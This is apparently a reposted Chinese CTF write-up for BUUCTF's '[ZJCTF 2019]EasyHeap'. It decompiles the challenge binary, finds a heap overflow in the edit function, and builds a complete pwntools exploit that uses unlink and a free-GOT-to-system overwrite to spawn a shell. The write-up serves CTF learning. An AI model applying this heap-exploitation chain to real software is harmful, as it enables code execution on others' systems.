当前位置: 首页 > article >正文

BUUCTF [ZJCTF 2019]EasyHeap

前置知识点:

unlink知识点和手法-CSDN博客

[ZJCTF 2019]EasyHeap

[ZJCTF 2019]EasyHeap

1.准备

2.ida分析
main函数
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{int n3; // eaxchar buf[8]; // [rsp+0h] [rbp-10h] BYREFunsigned __int64 v5; // [rsp+8h] [rbp-8h]v5 = __readfsqword(0x28u);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stdin, 0LL, 2, 0LL);while ( 1 ){while ( 1 ){menu();read(0, buf, 8uLL);n3 = atoi(buf);if ( n3 != 3 )break;delete_heap();}if ( n3 > 3 ){if ( n3 == 4 )exit(0);if ( n3 == 4869 ){if ( (unsigned __int64)magic <= 0x1305 ){puts("So sad !");}else{puts("Congrt !");l33t();}}else{
LABEL_17:puts("Invalid Choice");}}else if ( n3 == 1 ){create_heap();}else{if ( n3 != 2 )goto LABEL_17;edit_heap();}}
}

就有一个堆题正常的菜单,有增删改功能,依次查看

1-create_heap函数
unsigned __int64 create_heap()
{int i; // [rsp+4h] [rbp-1Ch]size_t size; // [rsp+8h] [rbp-18h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v4; // [rsp+18h] [rbp-8h]v4 = __readfsqword(0x28u);for ( i = 0; i <= 9; ++i ){if ( !*(&heaparray + i) ){printf("Size of Heap : ");read(0, buf, 8uLL);size = atoi(buf);*(&heaparray + i) = malloc(size);if ( !*(&heaparray + i) ){puts("Allocate Error");exit(2);}printf("Content of heap:");read_input(*(&heaparray + i), size);puts("SuccessFul");return __readfsqword(0x28u) ^ v4;}}return __readfsqword(0x28u) ^ v4;
}

这里是添加堆块,限制了创建堆块的个数和大小

3-delete_heap函数
unsigned __int64 delete_heap()
{int n0xA; // [rsp+Ch] [rbp-14h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v3; // [rsp+18h] [rbp-8h]v3 = __readfsqword(0x28u);printf("Index :");read(0, buf, 4uLL);n0xA = atoi(buf);if ( (unsigned int)n0xA >= 0xA ){puts("Out of bound!");_exit(0);}if ( *(&heaparray + n0xA) ){free(*(&heaparray + n0xA));*(&heaparray + n0xA) = 0LL;puts("Done !");}else{puts("No such heap !");}return __readfsqword(0x28u) ^ v3;
}

没存在UAF漏洞

2-edit函数
unsigned __int64 edit_heap()
{int n0xA; // [rsp+4h] [rbp-1Ch]__int64 size; // [rsp+8h] [rbp-18h]char buf[8]; // [rsp+10h] [rbp-10h] BYREFunsigned __int64 v4; // [rsp+18h] [rbp-8h]v4 = __readfsqword(0x28u);printf("Index :");read(0, buf, 4uLL);n0xA = atoi(buf);if ( (unsigned int)n0xA >= 0xA ){puts("Out of bound!");_exit(0);}if ( *(&heaparray + n0xA) ){printf("Size of Heap : ");read(0, buf, 8uLL);size = atoi(buf);printf("Content of heap : ");read_input(*(&heaparray + n0xA), size);puts("Done !");}else{puts("No such heap !");}return __readfsqword(0x28u) ^ v4;
}

这里修改堆块数据,但没有限制用户输入内容的大小,当修改堆块大小大于原本堆块大小,并且修改内容大于原本大小时,会造成堆溢出。

4869-l33t函数(后门函数)

发现在选择4869的时候,会对magic的数据进行大小判断,当其不小于等于0x1305的时候,有一个l33t函数

int l33t()
{return system("cat /home/pwn/flag");
}

这里是一个连接点

3.EXP
思路:

这题有堆溢出和连接点,一开始想着去改magic,触发连接点,但能力不太行,正好这题可以用unlink,就当做学习unlink的一道例题
因为不用连接点,但可以用system函数,所以我们可以想办法写入'/bin/sh'
1.构造一个fake_chunk(伪造堆块),触发unlink
2.通过覆盖free_got地址为system地址,将free函数的调用重定向到system函数
3.最后通过添加删除带有'/bin/sh'内容的堆块,获得flag
先创建三个堆块,前两个chunk0和chunk1用于unlink,第三个chunk2写入内容'/bin/sh',用于最后释放,触发连接

from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(size,content):io.sendlineafter("Your choice :", "1")io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap:", content)def delete(index):io.sendlineafter("Your choice :", "3")io.sendlineafter("Index :", str(index))def edit(index,size, content):io.sendlineafter("Your choice :", "2")io.sendlineafter("Index :", str(index))io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap :", content)add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2

然后构造一个fake_chunk(伪造堆块),这里的目标地址是heaparray的0x6020E0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)

把构造的fake_chunk写入chunk0

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)


在释放1块,触发unlink

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)

我们加上偏移,然后把free_got的地址写入

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)

这里写入的是heaparray[0],对应了chunk0

接着覆盖free_got地址为system地址,将free函数的调用重定向到system函数

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))


最后释放带有'/bin/sh'内容2块,形成system('/bin/sh'),触发连接

add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))delete(2)
脚本
from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28246)
io= process('/home/motaly/heap')
elf=ELF('/home/motaly/heap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(size,content):io.sendlineafter("Your choice :", "1")io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap:", content)def delete(index):io.sendlineafter("Your choice :", "3")io.sendlineafter("Index :", str(index))def edit(index,size, content):io.sendlineafter("Your choice :", "2")io.sendlineafter("Index :", str(index))io.sendlineafter("Size of Heap :", str(size))io.sendlineafter("Content of heap :", content)add(0x30,'aaaa') #0
add(0x80,'bbbb') #1
add(0x20,b"/bin/sh\x00")#2# fake_chunk(伪造堆块)
heaparray=0x6020E0
payload=p64(0) #prev_size
payload+=p64(0x31) #size
payload+=p64(heaparray-0x18) #fd
payload+=p64(heaparray-0x10) #bk
payload = payload.ljust(0x30, b'a')  # padding
payload+=p64(0x30)
payload+=p64(0x90)edit(0,0x60,payload)
delete(1)payload = b'a'*0x18+p64(elf.got['free'])
success("free_got is: " + hex(elf.got['free']))
edit(0,0x20,payload)edit(0,8,p64(elf.plt['system']))
success("system_plt is: " + hex(elf.plt['system']))delete(2)io.interactive()
http://www.lryc.cn/news/2387070.html

相关文章:

  • 机器学习AI精准预测复合材料性能、材料结构设计优化;数据驱动加速新材料研发,百年难遇的组合打破科研壁垒!
  • apache http client连接池实现原理
  • 如何做好一份网络安全技术文档?
  • Android Studio 介绍
  • MD5加密(Java)
  • [攻防世界] easyphp writeup
  • 力扣热题100之LRU缓存机制
  • 如何不规范的设置密码
  • 数据安全与纵深访问控制:构建数字时代的安全防线
  • 分享全国数字人才技能提升师资培训班 第五期邀请函
  • Linux三剑客之grep命令使用教程
  • Kotlin 极简小抄 P8(不可空类型、可空类型、注意事项、非空断言 !!)
  • 【Spring AI集成实战】基于NVIDIA LLM API构建智能聊天应用:从配置到函数调用全解析
  • git 删除某个远程库的分支
  • Redis实战-缓存篇(万字总结)
  • QT5.15 MacOS 打包指南
  • Nginx location匹配模式详解
  • Vue 3 路由传参使用指南
  • vscode使用ssh链接服务器
  • 企业批量处理刚需PrintPDF 网络财务办公打印 网页到 Office 一键转 PDF
  • Python学习笔记--Django 表单处理
  • Python - 文件部分
  • 【监控】Blackbox Exporter 黑盒监控
  • 历年福州大学保研上机真题
  • 【RAG】ragflow源码亮点:文档embedding向量化加权融合
  • 大模型学习笔记day2 LoRA微调
  • Maven-概述-介绍安装
  • GitHub Page填写域名显示被占用
  • js实现监听Ctrl/Cmd+C复制、Ctrl/Cmd+Z撤销 等快捷键
  • java高级 -动态代理